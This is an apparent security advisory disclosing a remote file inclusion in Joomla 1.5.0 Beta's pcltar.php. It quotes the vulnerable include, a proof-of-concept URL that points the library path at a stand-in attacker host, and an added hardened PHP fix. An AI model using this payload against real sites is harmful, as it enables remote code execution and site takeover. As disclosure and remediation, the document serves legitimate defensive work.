
Joomla 1.5.0 Beta remote file include



Remote file inclusion in Joomla 1.5.0 Beta



Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has good security, but it seems that Joomla 1.5.0 doesn't
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta:

File /libraries/pcl/pcltar.php, Line 74:
  if (!defined("PCLERROR_LIB"))
  {
    include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? 

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html 


- Omid
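
A hardened form of the include quoted in the advisory, added here as an example; it is not part of the original post and is not Joomla's actual patch. It assumes the application entry point defines `_JEXEC` before loading libraries, and `pcl_safe_lib_path` is a hypothetical helper name.

```php
<?php
// Added example: hardened sketch of the include at pcltar.php line 74.

// 1. Refuse direct web requests to the library file.
//    Assumption: the entry point defines _JEXEC before loading libraries.
defined('_JEXEC') or die('Restricted access');

// 2. Assign the path variables unconditionally from trusted values, so a
//    request parameter of the same name cannot pre-seed them (as it can
//    when PHP's register_globals is enabled).
$g_pcltar_lib_dir   = dirname(__FILE__);
$g_pcltar_extension = 'php';

/**
 * Hypothetical helper: resolve a library file name and confirm the
 * result is a local file inside $baseDir. Returns the path or false.
 */
function pcl_safe_lib_path($baseDir, $name, $extension)
{
    // Plain file-name characters only: no scheme separator, no slash.
    if (!preg_match('/^[A-Za-z0-9_.]+$/', $name)
        || !preg_match('/^[a-z0-9]+$/', $extension)) {
        return false;
    }
    // realpath() returns false for URLs and for missing files.
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.' . $extension);
    if ($path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

// 3. Include only a path that passed the containment check.
if (!defined("PCLERROR_LIB")) {
    $lib = pcl_safe_lib_path($g_pcltar_lib_dir, 'pclerror.lib', $g_pcltar_extension);
    if ($lib === false) {
        die('pclerror library not found');
    }
    include $lib;
}
```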

